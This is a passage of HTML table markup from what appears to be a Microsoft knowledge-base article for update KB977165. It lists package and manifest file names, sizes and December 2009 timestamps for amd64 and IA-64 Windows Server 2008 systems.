class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,439</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_sc_1_bf~31bf3856ad364e35~amd64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,684</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_sc_1~31bf3856ad364e35~amd64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,711</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_sc_bf~31bf3856ad364e35~amd64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,689</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_sc~31bf3856ad364e35~amd64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,720</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_server_0_bf~31bf3856ad364e35~amd64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,423</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_server_0~31bf3856ad364e35~amd64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,442</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_server_1_bf~31bf3856ad364e35~amd64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,688</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_server_1~31bf3856ad364e35~amd64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,715</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_server_bf~31bf3856ad364e35~amd64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,701</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_server~31bf3856ad364e35~amd64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,732</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_winpesrv_0_bf~31bf3856ad364e35~amd64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,420</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_winpesrv_0~31bf3856ad364e35~amd64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,439</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_winpesrv_bf~31bf3856ad364e35~amd64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,428</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_winpesrv~31bf3856ad364e35~amd64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,447</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_winpe_0_bf~31bf3856ad364e35~amd64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,418</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_winpe_0~31bf3856ad364e35~amd64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,437</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_winpe_bf~31bf3856ad364e35~amd64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,422</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_winpe~31bf3856ad364e35~amd64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,441</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Update-bf.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">4,001</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr></table></div><h4 class=\"sbody-h4\">Additional files for all supported IA-64-based versions of Windows Server 2008</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Ia64_04db60dae38a74f5f5e8fd5e74ae2459_31bf3856ad364e35_6.0.6001.22577_none_725bbe271427b578.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">699</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Ia64_2228d5b054a1fdbf720a9b954c4a1ecc_31bf3856ad364e35_6.0.6001.18377_none_56415d38b6568b39.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">699</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Ia64_68bca894f3f4e7d2dd5a845874478a1c_31bf3856ad364e35_6.0.6002.22283_none_5d20e67b4f174ca8.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">699</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Ia64_7701bf7ec4e4eee77ff1162d37855c1a_31bf3856ad364e35_6.0.6002.18160_none_84aa747422c80682.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">699</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Ia64_microsoft-windows-os-kernel_31bf3856ad364e35_6.0.6001.18377_none_6bed5ddab45387d1.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">16,819</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">08-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">21:27</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Ia64_microsoft-windows-os-kernel_31bf3856ad364e35_6.0.6001.22577_none_6c76fc8bcd7124c2.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">16,819</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">08-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">21:41</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Ia64_microsoft-windows-os-kernel_31bf3856ad364e35_6.0.6002.18160_none_6dd79f8eb1780cca.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">16,819</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">08-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">21:16</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Ia64_microsoft-windows-os-kernel_31bf3856ad364e35_6.0.6002.22283_none_6e4e9d5fcaa3307b.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">16,819</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">08-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">21:27</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_1_for_kb977165_bf~31bf3856ad364e35~ia64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,749</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_1_for_kb977165~31bf3856ad364e35~ia64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,454</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_2_for_kb977165_bf~31bf3856ad364e35~ia64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,754</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_2_for_kb977165~31bf3856ad364e35~ia64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,459</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_3_for_kb977165_bf~31bf3856ad364e35~ia64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,754</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_3_for_kb977165~31bf3856ad364e35~ia64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,459</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_4_for_kb977165_bf~31bf3856ad364e35~ia64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,071</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_4_for_kb977165~31bf3856ad364e35~ia64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,786</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td 